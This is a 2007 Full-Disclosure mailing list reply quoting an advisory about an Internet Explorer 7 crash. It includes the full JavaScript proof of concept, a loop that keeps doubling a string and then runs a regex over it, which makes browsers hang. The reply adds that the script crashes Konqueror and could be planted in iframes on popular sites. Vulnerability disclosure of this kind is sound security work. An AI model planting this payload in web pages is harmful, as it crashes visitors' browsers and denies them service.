Re: [Full-disclosure] Internet Explorer Crash



This also works under Konqueror.

There should be an implementation on ALL browsers that a loop so large is
unacceptable and refuse to even run it. There is no viable reason for a
client-side to run a loop through so many iterations.

This DoS technique could be abused and iframes with the code could be
embedded within popular websites, effectively causing a denial of service to
that specific site.


On Tuesday 17 April 2007 13:09, J. Oquendo wrote:
Product: Internet Explorer Version 7.0.5730.11
Impact: Browser crash possibly more
Author: Jesus Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'


I. BACKGROUND
Why bother? Who doesn't know what Internet Explorer and Microsoft are?

II. DESCRIPTION
IE 7 is vulnerable to a script which causes the browser to hang. The
memory and CPU usage go through the roof. Originally the script caused
(and still causes) Safari and Konqueror to crash.

III. SOLUTION
Stop using Microsoft products or deal with a new advisory every other
day.

IV. Proof
http://www.infiltrated.net/stupidInternetExploder.html

V. Code

$ more /stupidInternetExploder.html

<script>

var reg = /(.)*/;

var z = 'Z';
while (z.length <=
999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999999999999
9999999
999999999999999999999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999999999999
9999999
999999999999999999999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999999999999
9999999
999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999) z+=z; var boum = reg.exec(z);

</script>

Goodbye


J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


